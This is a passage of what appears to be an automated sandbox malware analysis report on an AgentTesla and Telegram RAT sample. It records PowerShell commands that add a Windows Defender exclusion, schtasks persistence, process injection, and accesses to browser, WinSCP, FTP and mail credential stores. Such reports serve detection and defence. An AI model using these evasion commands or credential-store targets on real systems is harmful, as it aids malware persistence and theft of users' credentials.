                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299422
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299311
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299203
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299093
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298984
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298871
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298765
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298656
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298547
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298437
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298328
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298218
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298109
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298000
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297890
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297781
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297671
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297562
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297453
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297330
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297203
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297093
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296984
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296875
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296765
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296656
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296547
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296437
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296316
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296187
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296078
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 295968
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 295856
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 295749
                      Source: vZkoWbol.exe, 00000007.00000002.2143441944.0000000009146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\=}v
                      Source: vZkoWbol.exe, 00000007.00000002.2143441944.0000000009132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
                      Source: vZkoWbol.exe, 00000007.00000002.2143441944.0000000009132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-~b
                      Source: z1E-catalogSamples.exe, 00000006.00000002.4524319407.00000000012E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
                      Source: vZkoWbol.exe, 0000000C.00000002.4539079433.0000000006560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory written: C:\Users\user\Desktop\z1E-catalogSamples.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMemory written: C:\Users\user\AppData\Roaming\vZkoWbol.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Users\user\Desktop\z1E-catalogSamples.exe "C:\Users\user\Desktop\z1E-catalogSamples.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Users\user\Desktop\z1E-catalogSamples.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Users\user\Desktop\z1E-catalogSamples.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Users\user\AppData\Roaming\vZkoWbol.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Users\user\AppData\Roaming\vZkoWbol.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: z1E-catalogSamples.exe PID: 3472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vZkoWbol.exe PID: 7324, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: z1E-catalogSamples.exe PID: 3472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vZkoWbol.exe PID: 7324, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: z1E-catalogSamples.exe PID: 3472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vZkoWbol.exe PID: 7324, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE
